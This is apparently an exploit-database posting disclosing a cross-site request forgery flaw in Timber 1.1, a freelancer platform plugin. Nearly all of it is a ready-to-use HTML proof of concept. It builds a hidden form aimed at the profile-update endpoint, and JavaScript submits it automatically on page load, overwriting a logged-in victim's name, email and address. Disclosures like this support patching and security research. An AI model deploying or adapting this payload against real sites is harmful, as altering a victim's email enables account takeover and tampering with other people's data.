Timber 1.1 Cross Site Request Forgery

Timber version 1.1 suffers from a cross site request forgery vulnerability.


MD5 | 849624a202863f839d14cfc3536399e3

# Exploit Title: Timber - Ultimate Freelancer Platform  1.1 - Cross site request forgery
# Date: 2018-05-24
# Exploit Author: L0RD or [email protected]
# Vendor Homepage:
https://codecanyon.net/item/timber-ultimate-freelancer-platform/14747284?s_rank=1717
# Version: 1.1
# Tested on: Kali linux
=========================================

# POC :

<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://test.com/timber/request/backend/ajax/profile/update_user_profile" method="POST">
<input type="hidden" name="user_nonce" value="e748717abd" />
<input type="hidden" name="profile_avatar" value="" />
<input type="hidden" name="first_name" value="decode" />
<input type="hidden" name="last_name" value="lord" />
<input type="hidden" name="user_name" value="test" />
<input type="hidden" name="job" value="Marketing Specialist" />
<input type="hidden" name="company" value="Envato" />
<input type="hidden" name="email" value="[email protected]decode.com" />
<input type="hidden" name="website" value="http://envato.com" />
<input type="hidden" name="language" value="en_US" />
<input type="hidden" name="phone_num" value="+33 (0)1 42 68 53 00" />
<input type="hidden" name="country" value="FR" />
<input type="hidden" name="city" value="Paris" />
<input type="hidden" name="address1" value="8 Rue de Londres" />
<input type="hidden" name="address2" value="75009 test" />
<input type="hidden" name="zip_code" value="" />
<input type="hidden" name="vat_nubmer" value="" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

==========================================


Related Posts